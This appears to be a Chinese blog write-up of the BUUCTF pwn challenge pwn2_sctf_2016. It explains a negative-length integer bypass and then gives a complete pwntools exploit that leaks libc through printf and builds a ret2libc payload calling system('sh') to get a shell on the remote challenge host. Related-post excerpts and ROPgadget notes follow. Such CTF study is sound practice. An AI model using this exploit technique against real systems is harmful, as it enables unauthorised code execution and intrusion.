pwn2_sctf_2016

于 2023-05-23 11:24:29 发布
阅读量102 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130823253
版权

小白垃圾做题笔记,不建议阅读。

这道题,依旧做了半天。

查保护:绕过NX

 

32位ida:

 

 

 

代码就是这样吧。需要先绕过一下整数。然后利用溢出点溢出。

溢出点是vuln函数。因为get_n函数一次只能从缓冲区获取一个字符,它的作用好像就是把字符·放到vuln的buf中。

思路是泄露libc,通过printf,将printf的libc打印出来然后搜索。不幸的是,我没有搜到,在搜了一晚上加一上午后。我去交流群内讨论,结果师傅说,buu有libc。

好吧,无知是本罪。

buu点FAQ:

网址点进去就是了。这道题说是ubuntu16,所以下16,32位(刚刚看过)

然后把libc复制到题目路径下,不是也可以,自己决定,仅仅是一个路径而已。

然后exp:

from pwn import *
from LibcSearcher import *
debug=0
if debug:
    p=process('./pwn2_sctf_2016')
    elf=ELF('./pwn2_sctf_2016')
    #libc=ELF('/lib/i386-linux-gnu/libc.so.6')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    #gdb.attach(p)
else:
    p=remote('node4.buuoj.cn',28479)
    elf=ELF('./pwn2_sctf_2016')
    libc=ELF('./libc-2.23 .so')
def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)

def sl(x):
    p.sendline(x)
    
    
printf_plt_addr=elf.plt['printf']
printf_got_addr=elf.got['printf']
main_addr=elf.sym['main']  
 

ru(b'read? ')
se(b'-1\n')
ru(b'data!\n')

payload=b'a'*(0x2c+4)+p32(printf_plt_addr)+p32(main_addr)+p32(printf_got_addr)


se(payload+b'\n')

#printf_addr=u32(p.recv(4))
#ru(b'\n')
printf_addr=u32(p.recvuntil(b'\xf7')[-4:])
#printf_addr=u32(p.recv(4))
print(hex(printf_addr))

#libc=LibcSearcher('printf',printf_addr)
#libc_base_addr=printf_addr-libc.dump('printf')
#system_addr=libc_base_addr+libc.dump('system')
#bin_sh_addr=libc_base_addr+libc.dump('str_bin_sh')



libc_base_addr=printf_addr-libc.sym['printf']#	0x054020#	0x054020#0x04a020####	0x057a70#0x04ea70#0x047a70#
system_addr=libc_base_addr+ libc.sym['system']	#0x045000#      0x045000#0x03be50####0x048150#0x040950  #   0x037f50#
bin_sh_addr=libc_base_addr+ next(libc.search(b'sh\x00'))#next(libc.search(b'/bin/sh\x00'))#	0x18c33c#	0x18c

#338#0x1376e3####0x1bd0f5#0x182925#0x15e14c#next(libc.search(b'/bin/sh\x00'))



payload2=b'a'*(0x2c)+b'bbbb'+p32(system_addr)+b'aaaa'+p32(bin_sh_addr)#+b'\n'



ru(b'read? ')
se(b'-1\n')
ru(b'data!\n')

se(payload2+b'\n')
#ru(b'\n')
p.interactive()

#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"
#write_add=u32(p.recv(4))

#addr=u32(r.recvuntil('\xf7')[-4:])
#puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
#sa(b'wish!\n', b'%11$p')
#rl(b'0x')
#canary = int(p.recv(16), 16)

 

y6y6y666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2505
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 966
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF Pwn pwn2_sctf_2016
MrTreebook的博客
03-13 331
BUUCTF Pwn pwn2_sctf_20161.checksec2.IDA32vuln函数漏洞利用3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to rea
【CTF】pwn2_sctf_2016
凉水的博客
07-16 915
pwn2_sctf_2016
日行一pwn:pwn1_sctf_2016
m0_57221101的博客
05-13 585
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0
LSYZWF的博客
10-26 580
文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目 题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析 发现函数gets和系统命令cat 此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波 没有堆栈溢出保护 4、编写脚本 11.28125的十六进制可以在I
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
BUUCTF pwn2_sctf2016
红叶的博客
11-01 491
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
[BUUCTF-pwn]——pwn2_sctf_2016
Y_peak的博客
02-12 543
[BUUCTF-pwn]——pwn2_sctf_2016 题目地址: https://buuoj.cn/challenges#pwn2_sctf_2016 老规矩还是先checksec一下, 在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。 最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。 思路 利用printf泄露printf的实际地址, 通过计算偏移,以此
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 340
BUUCTF 做题练习
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 628
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
buuctf pwn2_sctf_2016
carol2358的博客
04-22 261
32的libc rop 64位是7f(8位),32位是f7(4位) exp: from pwn import * from LibcSearcher import * local_file = './pwn2_sctf_2016' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.s...
[BUUCFT]PWN——pwn2_sctf_2016
BangSen1的博客
04-03 458
pwn2_sctf_2016 例行检查,32位,开启了NX保护。 运行一下 用IDA打开。main函数调用了vuln函数 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,这边可以输入负数来达到溢出的效果(整数溢出) 我们可以通过,输入负数,绕过长度限制,造成溢出,再利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址,最后溢出覆盖返回地址去执行system(‘/bin/sh’) f
BUUCTF-Pwn-pwn2_sctf_2016
餐桌上的猫
03-25 228
exp from pwn import* from LibcSearcher import * elf=ELF('/home/lhb/桌面/pwn2_sctf_2016') p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf'] printf_got=elf.got['printf'] main=0x80485b8 p.sendlineafter(b'read? ',b'-1') payload=b'a'*(0x2c+4)+p32(p
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值